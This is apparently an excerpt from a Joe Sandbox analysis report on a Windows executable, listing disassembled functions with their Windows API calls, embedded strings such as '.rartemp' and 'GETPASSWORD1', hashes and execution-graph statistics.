                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: 8147e5dcc96d0627dfaea778f663e8ce23d11c87184a0374f603b18f597794a4
                                                • Instruction ID: 4a1bcbb9e3d43283aea2d33edf5b778c2d56cf94345bc79ad84bb6d92144245b
                                                • Opcode Fuzzy Hash: 8147e5dcc96d0627dfaea778f663e8ce23d11c87184a0374f603b18f597794a4
                                                • Instruction Fuzzy Hash: 4BE04F30680215B7EF201BF0FD06B1E3ED9EB10B91F200070FA0DB84E0DB6198119BA6
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                • Instruction ID: 73d8977e6bccd8c43f1a2fafa8e06bdc7a31f9b1153f210159d568d421738791
                                                • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                • Instruction Fuzzy Hash: CDA14B71A247869FEB11EF2CD8A17AEBBE4EF51350F3442EDE4959B282C6348D41C750
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B30481,?,00000000,?,00000001,?,?,00000001,00B30481,?), ref: 00B33685
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B3370E
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B2DBD1,?), ref: 00B33720
                                                • __freea.LIBCMT ref: 00B33729
                                                  • Part of subcall function 00B3040E: RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 5015317e9b29cd15f945b6565275b9dfd50855ee9c050c1bd8a04b91aec20d28
                                                • Instruction ID: 5b352eb91fe2ca4afc3f08594afe8d8d2edfa80e076453e71a815958fdca10ee
                                                • Opcode Fuzzy Hash: 5015317e9b29cd15f945b6565275b9dfd50855ee9c050c1bd8a04b91aec20d28
                                                • Instruction Fuzzy Hash: 36319CB2A0021AABDF259F64DC85DAF7BE5EB40750F2401A8EC04E6250EB35CE51CB90
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B162D4
                                                • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00B162EB
                                                • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00B16328
                                                • _wcslen.LIBCMT ref: 00B16338
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                • String ID:
                                                • API String ID: 3741103063-0
                                                • Opcode ID: 35dc5fbac75ab6275707764f95853dbbd0ba246f11a705138de62bbbc2babe54
                                                • Instruction ID: 97ad0c3726e29b9da6964d29e42bef8068f7dbc55d36655b0be67144b5f2f5ba
                                                • Opcode Fuzzy Hash: 35dc5fbac75ab6275707764f95853dbbd0ba246f11a705138de62bbbc2babe54
                                                • Instruction Fuzzy Hash: A211A0B0A0121AAFDB049FA8AD859FFBBF9FF45310B54019DA421A7280DB349D40CBE4
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B11273
                                                  • Part of subcall function 00B1067E: GetVersionExW.KERNEL32(?), ref: 00B106AF
                                                • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00B0350C,5EA84180,00000000,?,?,00B043F5,?,?,?,00000000), ref: 00B1129A
                                                • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00B112D4
                                                • _wcslen.LIBCMT ref: 00B112DF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FoldString$H_prolog3Version_wcslen
                                                • String ID:
                                                • API String ID: 535866816-0
                                                • Opcode ID: 0f1f4376106dfbbad67dc9e56647567b4ca7182cab516923261d8162d71510c8
                                                • Instruction ID: bef83902238457f5e49e978adc52132e0df6a895ee3f20ea18907144499e031e
                                                • Opcode Fuzzy Hash: 0f1f4376106dfbbad67dc9e56647567b4ca7182cab516923261d8162d71510c8
                                                • Instruction Fuzzy Hash: B0119171A11129ABDB049BAD9D499AF7BEDEF05720F200649B920E72D4CB70A98087E5
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00B3198B,00000000,00000000,00000000,00000000,?,00B31B88,00000006,FlsSetValue), ref: 00B31A16
                                                • GetLastError.KERNEL32(?,00B3198B,00000000,00000000,00000000,00000000,?,00B31B88,00000006,FlsSetValue,00B40DD0,FlsSetValue,00000000,00000364,?,00B300D7), ref: 00B31A22
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B3198B,00000000,00000000,00000000,00000000,?,00B31B88,00000006,FlsSetValue,00B40DD0,FlsSetValue,00000000), ref: 00B31A30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 250caa6ce7373c426dda9cfd0276514106c77f341d5386d52180e837977ff69f
                                                • Instruction ID: d3878803e1105b73467dfb3ad890eee8b210ff71d8089f4446aa799384f78256
                                                • Opcode Fuzzy Hash: 250caa6ce7373c426dda9cfd0276514106c77f341d5386d52180e837977ff69f
                                                • Instruction Fuzzy Hash: 5E01AC367562269BC7218AAD9C44A577BDCEF457A3F311D64F919E7240DB30D800CBE0
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B11310
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00B117FB,?,?,\\?\,5EA84158,?,?,?,00000000,00B3A279,000000FF), ref: 00B11319
                                                • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00B3A279,000000FF), ref: 00B11348
                                                • _wcslen.LIBCMT ref: 00B11351
                                                Similarity
                                                • API ID: CurrentDirectory$H_prolog3_wcslen
                                                • String ID:
                                                • API String ID: 19219720-0
                                                • Opcode ID: 241334a645ce9969b29d97469558a9a68e8b688aa1f5ff1946a15183171f6348
                                                • Instruction ID: b4abac00ab7b42612af21e4c7d62fb50b1b7d412d99241e05b8c68cdd0533c5a
                                                • Opcode Fuzzy Hash: 241334a645ce9969b29d97469558a9a68e8b688aa1f5ff1946a15183171f6348
                                                • Instruction Fuzzy Hash: 8D01A272900629BBCB14AFF899458FFBFBDAF81720B100689F615E7285CF34594087E4
                                                APIs
                                                • SleepConditionVariableCS.KERNELBASE(?,00B262BB,00000064), ref: 00B26341
                                                • LeaveCriticalSection.KERNEL32(00B560E0,?,?,00B262BB,00000064,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B2634B
                                                • WaitForSingleObjectEx.KERNEL32(00000064,00000000,?,00B262BB,00000064,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B2635C
                                                • EnterCriticalSection.KERNEL32(00B560E0,?,00B262BB,00000064,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B26363
                                                Similarity
                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                • String ID:
                                                • API String ID: 3269011525-0
                                                • Opcode ID: bb6007622d660c74ba76baf67708e51299a93757ba41c4ac239b43f9bbc1197e
                                                • Instruction ID: 104d0c0aeb43f6b479e94e8e86baacd9c546dbd730786f15079ddfc2e4182667
                                                • Opcode Fuzzy Hash: bb6007622d660c74ba76baf67708e51299a93757ba41c4ac239b43f9bbc1197e
                                                • Instruction Fuzzy Hash: 9AE06D32540274EBC7111B94AC49B9E7F68AB08BA2B5840D0F90AB31A0CB615D149BD8
                                                APIs
                                                • GetDC.USER32(00000000), ref: 00B1EB77
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B1EB86
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B1EB94
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00B1EBA2
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 12271a5d4603471ce41ddce07d4672b7727fe09c30bd2cff5bfe57e69c2089bf
                                                • Instruction ID: 0cc1e21fcd1d28be1a5a3fa1ed935d4c8ac36d68f94ecd37d46ec89ceb26c28e
                                                • Opcode Fuzzy Hash: 12271a5d4603471ce41ddce07d4672b7727fe09c30bd2cff5bfe57e69c2089bf
                                                • Instruction Fuzzy Hash: 15E0EC31A8AF20ABD6621B70BD1DB873A94AB19B53F0401C1FA06AB1D0CEA044408B94
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 00B18294
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B2087E: __EH_prolog3_GS.LIBCMT ref: 00B20885
                                                  • Part of subcall function 00B2087E: GetLastError.KERNEL32(0000001C,00B18244,?,00000000,00000086,?,5EA84158,?,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B2089D
                                                  • Part of subcall function 00B2087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00B3A75D,000000FF), ref: 00B208D6
                                                Strings
                                                Similarity
                                                • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                                • String ID: %ls
                                                • API String ID: 1279724102-3246610740
                                                • Opcode ID: 91a22f8caa9d25340d781fde790179e7bbcccba4f3cbb6a935826bda8fd2864a
                                                • Instruction ID: 6ad0fa66c22ab07daa731e10814545db6776ec55721d3c284d347873d7a07867
                                                • Opcode Fuzzy Hash: 91a22f8caa9d25340d781fde790179e7bbcccba4f3cbb6a935826bda8fd2864a
                                                • Instruction Fuzzy Hash: 48B1CA70841209EADB24EF94C986EEE7BF1FF15300FA048D9F456261E1DB71AA94DA80
                                                APIs
                                                  • Part of subcall function 00B1EBAA: GetDC.USER32(00000000), ref: 00B1EBAE
                                                  • Part of subcall function 00B1EBAA: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B1EBB9
                                                  • Part of subcall function 00B1EBAA: ReleaseDC.USER32(00000000,00000000), ref: 00B1EBC4
                                                • GetObjectW.GDI32(?,00000018,?), ref: 00B1EF65
                                                  • Part of subcall function 00B1F1EC: GetDC.USER32(00000000), ref: 00B1F1F5
                                                  • Part of subcall function 00B1F1EC: GetObjectW.GDI32(?,00000018,?), ref: 00B1F224
                                                  • Part of subcall function 00B1F1EC: ReleaseDC.USER32(00000000,?), ref: 00B1F2BC
                                                Strings
                                                Similarity
                                                • API ID: ObjectRelease$CapsDevice
                                                • String ID: (
                                                • API String ID: 1061551593-3887548279
                                                • Opcode ID: 7e5d4c7bad8d175a4bec9659bacf756be7b1d4d66854fdf3adc0beb5f05a9879
                                                • Instruction ID: 69c9b1f530fb59b1b799869341da38bfd788e45ad765de037a1934c721f423d1
                                                • Opcode Fuzzy Hash: 7e5d4c7bad8d175a4bec9659bacf756be7b1d4d66854fdf3adc0beb5f05a9879
                                                • Instruction Fuzzy Hash: 1391F371608315AFC610DF65DC44A6BBBE9FF89710F10495EF98AE7260CB70E905CB62
                                                APIs
                                                  • Part of subcall function 00B179F7: GetSystemTime.KERNEL32(?,00000000), ref: 00B17A0F
                                                  • Part of subcall function 00B179F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B17A1D
                                                  • Part of subcall function 00B179A0: __aulldiv.LIBCMT ref: 00B179A9
                                                • __aulldiv.LIBCMT ref: 00B0F162
                                                • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,5EA84158,?,?,00000000,?,00000000,00B39F3D,000000FF), ref: 00B0F169
                                                  • Part of subcall function 00B01150: _wcslen.LIBCMT ref: 00B0115B
                                                Strings
                                                Similarity
                                                • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                • String ID: .rartemp
                                                • API String ID: 3789791499-2558811017
                                                • Opcode ID: 509b777f90f2b312b35e36f75f7822c1211d62bea5ffeba1dc384aaab1eadf18
                                                • Instruction ID: b6ec183f48d44571f8d02c4f753c4c05591a18d9be7998a816b84a0151d981cb
                                                • Opcode Fuzzy Hash: 509b777f90f2b312b35e36f75f7822c1211d62bea5ffeba1dc384aaab1eadf18
                                                • Instruction Fuzzy Hash: 0E418271900249AFDB18EFA4CC45EEE7BE9EF54310F5045A9B915A3281EB349B49CB60
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B1DAD5
                                                  • Part of subcall function 00B10360: __EH_prolog3.LIBCMT ref: 00B10367
                                                Strings
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID: Shell.Explorer$about:blank
                                                • API String ID: 431132790-874089819
                                                • Opcode ID: 2c84b4b802a2b8f37187eec448a62e457c6610712909724b7a5d2a6d87309da0
                                                • Instruction ID: 442cdb17273eff8d7ff398439448d7528191bc66327e302ffe48c7e6ef789caa
                                                • Opcode Fuzzy Hash: 2c84b4b802a2b8f37187eec448a62e457c6610712909724b7a5d2a6d87309da0
                                                • Instruction Fuzzy Hash: EE413E70600211DFDB18DFA4D895BAA77F5EF88700F6584EDE906AF2A1DB70AD80CB50
                                                APIs
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000001), ref: 00B2017B
                                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B201B9
                                                Strings
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: GETPASSWORD1
                                                • API String ID: 445417207-3292211884
                                                • Opcode ID: b56e8fb190a218bd4bcb797b24c3a61de968da5b29c8ffd6058764e6d05a7fce
                                                • Instruction ID: 6239419971c25926859b459c2dc7f1af85b4e30461c460f51b3f3162431186f5
                                                • Opcode Fuzzy Hash: b56e8fb190a218bd4bcb797b24c3a61de968da5b29c8ffd6058764e6d05a7fce
                                                • Instruction Fuzzy Hash: C11129B265432477D230AA24AC85FFB77ECEB85702F0004A9F749B3091CB74A8518765
                                                APIs
                                                  • Part of subcall function 00B15094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B150B3
                                                  • Part of subcall function 00B15094: GetProcAddress.KERNEL32(00B551F8,CryptUnprotectMemory), ref: 00B150C3
                                                • GetCurrentProcessId.KERNEL32(?,00000200,?,00B15104), ref: 00B15197
                                                Strings
                                                • CryptProtectMemory failed, xrefs: 00B1514E
                                                • CryptUnprotectMemory failed, xrefs: 00B1518F
                                                Similarity
                                                • API ID: AddressProc$CurrentProcess
                                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                • API String ID: 2190909847-396321323
                                                • Opcode ID: e9d2980c35c553077efe7cdfcfe8c9e600c9c17f96614cb763c6174aa26d9ec7
                                                • Instruction ID: 50d23f10e1c0b177cae2602a69b0c1b823cee173c8a22a4a0be49c7a299dcddc
                                                • Opcode Fuzzy Hash: e9d2980c35c553077efe7cdfcfe8c9e600c9c17f96614cb763c6174aa26d9ec7
                                                • Instruction Fuzzy Hash: 0311E432601A24FBDB365F609C417AE3BE5EF80B62B5040D5FC117B291DB70AD9187E4
                                                APIs
                                                • IsWindowVisible.USER32(00010460), ref: 00B24291
                                                • DialogBoxParamW.USER32(GETPASSWORD1,00010460,00B20110,?), ref: 00B242BA
                                                Strings
                                                Similarity
                                                • API ID: DialogParamVisibleWindow
                                                • String ID: GETPASSWORD1
                                                • API String ID: 3157717868-3292211884
                                                • Opcode ID: cd1f6a067e009e4a0caadd1919dd4e1bf185df9ff19b6f37dcd91de514a4045a
                                                • Instruction ID: 9acb9ed77d120e11df90e1ae7359ecf64db03856bcc4083544ab5f704ceedcee
                                                • Opcode Fuzzy Hash: cd1f6a067e009e4a0caadd1919dd4e1bf185df9ff19b6f37dcd91de514a4045a
                                                • Instruction Fuzzy Hash: 0B0149312A5734FBC7206B65AC16F963BC8EB02313B0441C5F84AA35E1CFA0A844CB60
                                                APIs
                                                  • Part of subcall function 00B13EAA: _swprintf.LIBCMT ref: 00B13EEA
                                                  • Part of subcall function 00B13EAA: _strlen.LIBCMT ref: 00B13F0B
                                                  • Part of subcall function 00B13EAA: SetDlgItemTextW.USER32(?,00B4919C,?), ref: 00B13F64
                                                  • Part of subcall function 00B13EAA: GetWindowRect.USER32(?,?), ref: 00B13F9A
                                                  • Part of subcall function 00B13EAA: GetClientRect.USER32(?,?), ref: 00B13FA6
                                                • GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                • SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                Strings
                                                Similarity
                                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                • String ID: 0
                                                • API String ID: 2622349952-4108050209
                                                • Opcode ID: 584ed7905a56cb7cf1bfb5a25d7982bcdaeaaa497b412c1e8bfa3ef3f7a52ea9
                                                • Instruction ID: c8acbafaa8830078e792dbb37eef9f428035111223f7e04e31c80f07db7ca2c6
                                                • Opcode Fuzzy Hash: 584ed7905a56cb7cf1bfb5a25d7982bcdaeaaa497b412c1e8bfa3ef3f7a52ea9
                                                • Instruction Fuzzy Hash: 31F08C31544348A6DF190F64ED4ABEF3FD8BB04345F4489D4BC44652E1CBB4CA90EA60
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,00B1770A,?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175F3
                                                • GetLastError.KERNEL32(?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175FF
                                                  • Part of subcall function 00B092EB: __EH_prolog3_GS.LIBCMT ref: 00B092F2
                                                Strings
                                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B17608
                                                Similarity
                                                • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                • API String ID: 2419225763-2248577382
                                                • Opcode ID: e561f9d90c17972883fd5b2b5970e9229bdf212e13301a82a5a948e9469ed94e
                                                • Instruction ID: 652d9833e43fd1556106926b11c81c2d7d69f2d7b11f0fbbaf33903caed0241a
                                                • Opcode Fuzzy Hash: e561f9d90c17972883fd5b2b5970e9229bdf212e13301a82a5a948e9469ed94e
                                                • Instruction Fuzzy Hash: 70D05E3254C431B7D62423A86C0ACAE3E959B22330F700794F63A762F6DE20098183A9
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,5EA84158), ref: 00B13E65
                                                • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00B13E73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FindHandleModuleResource
                                                • String ID: RTL
                                                • API String ID: 3537982541-834975271
                                                • Opcode ID: e2d2fb8f978df2febbfa06ff0522a640792903b58b58f85685e2056abeeb1eac
                                                • Instruction ID: 6268894cb1a921ebc90f53272446e3299748889fbac268bdb6fb94b181787dbb
                                                • Opcode Fuzzy Hash: e2d2fb8f978df2febbfa06ff0522a640792903b58b58f85685e2056abeeb1eac
                                                • Instruction Fuzzy Hash: A5C01231640350A6E73417B16D0DB872DD89B04B15F150498F505AA0E0DAE5D4418BA0

                                                Execution Graph

                                                Execution Coverage:3.9%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:52
API calls 92727->92728 92729 377d6f 92728->92729 92729->92705 92731 37c70b 92730->92731 92732 3c1228 92731->92732 92737 37c713 messages 92731->92737 92733 39016b 8 API calls 92732->92733 92735 3c1234 92733->92735 92734 37c71a 92734->92708 92737->92734 92738 37c780 92737->92738 92739 37c78b messages 92738->92739 92741 37c7c6 messages 92739->92741 92742 38e29c 8 API calls messages 92739->92742 92741->92737 92742->92741 92746 3779ed 8 API calls 92745->92746 92747 3ddab6 GetFileAttributesW 92746->92747 92748 3ddaca GetLastError 92747->92748 92751 3ddae3 92747->92751 92749 3ddad7 CreateDirectoryW 92748->92749 92750 3ddae5 92748->92750 92749->92750 92749->92751 92750->92751 92752 3796d9 8 API calls 92750->92752 92751->92000 92753 3ddb27 92752->92753 92754 3dda81 8 API calls 92753->92754 92755 3ddb30 92754->92755 92755->92751 92756 3ddb34 CreateDirectoryW 92755->92756 92756->92751 92758 39016b 8 API calls 92757->92758 92759 3741b8 92758->92759 92759->92023 92761 37bceb 8 API calls 92760->92761 92762 3fd6bf 92761->92762 92763 37bceb 8 API calls 92762->92763 92764 3fd6c7 92763->92764 92765 37bceb 8 API calls 92764->92765 92766 3fd6cf 92765->92766 92767 3fd737 92766->92767 92768 37627c 8 API calls 92766->92768 92769 37bceb 8 API calls 92767->92769 92770 3fd6e5 92768->92770 92773 3fd735 92769->92773 92770->92767 92771 37627c 8 API calls 92770->92771 92772 3fd6f7 92771->92772 92772->92767 92774 3fd6fc 92772->92774 92775 378685 8 API calls 92773->92775 92776 3796d9 8 API calls 92774->92776 92777 3fd760 92775->92777 92782 3fd707 92776->92782 92778 378685 8 API calls 92777->92778 92779 3fd777 92778->92779 92780 3779ed 8 API calls 92779->92780 92781 3fd780 92780->92781 92781->92050 92783 378685 8 API calls 92782->92783 92784 3fd728 92783->92784 92785 3796d9 8 API calls 92784->92785 92785->92773 92787 37c269 8 API calls 92786->92787 92788 3fd30e CharUpperBuffW 92787->92788 92789 3fd329 92788->92789 92790 37bf07 8 API calls 92789->92790 92791 3fd334 92790->92791 92792 378685 8 API 
calls 92791->92792 92793 3fd347 _wcslen 92792->92793 92794 3779ed 8 API calls 92793->92794 92795 3fd3a4 _wcslen 92793->92795 92794->92795 92795->92052 92799 3e17cb 92798->92799 92800 39016b 8 API calls 92799->92800 92801 3e17d2 92800->92801 92804 3dfbca 92801->92804 92803 3e180c 92803->92134 92805 37c269 8 API calls 92804->92805 92806 3dfbdd CharLowerBuffW 92805->92806 92809 3dfbf0 92806->92809 92807 3dfbfa ___scrt_fastfail 92807->92803 92808 3dfc2e 92810 3dfc40 92808->92810 92812 37627c 8 API calls 92808->92812 92809->92807 92809->92808 92811 37627c 8 API calls 92809->92811 92813 39019b 8 API calls 92810->92813 92811->92809 92812->92810 92814 3dfc6e 92813->92814 92815 3dfc90 92814->92815 92837 3dfb02 8 API calls 92814->92837 92822 3dfd21 92815->92822 92818 3dfccd 92818->92807 92819 39016b 8 API calls 92818->92819 92820 3dfce7 92819->92820 92821 39019b 8 API calls 92820->92821 92821->92807 92823 37bf07 8 API calls 92822->92823 92824 3dfd53 92823->92824 92825 37bf07 8 API calls 92824->92825 92826 3dfd5c 92825->92826 92827 37bf07 8 API calls 92826->92827 92834 3dfd65 92827->92834 92828 3784b7 8 API calls 92828->92834 92829 3e0029 92829->92818 92830 396718 GetStringTypeW 92830->92834 92832 396661 39 API calls 92832->92834 92833 3dfd21 40 API calls 92833->92834 92834->92828 92834->92829 92834->92830 92834->92832 92834->92833 92835 37acc0 8 API calls 92834->92835 92836 37be6d 8 API calls 92834->92836 92838 396742 GetStringTypeW 92834->92838 92835->92834 92836->92834 92837->92814 92838->92834 92840 3b5985 92839->92840 92841 376e69 CreateFileW 92839->92841 92842 376e88 92840->92842 92843 3b598b CreateFileW 92840->92843 92841->92842 92842->92172 92842->92173 92843->92842 92844 3b59b3 92843->92844 92889 376bfa 92844->92889 92848 376b27 92847->92848 92861 376b24 messages 92847->92861 92849 376bfa 3 API calls 92848->92849 92848->92861 92850 376b44 92849->92850 92851 3b589b 92850->92851 92852 376b51 92850->92852 92853 38fdc9 3 API calls 92851->92853 92854 39019b 8 API calls 
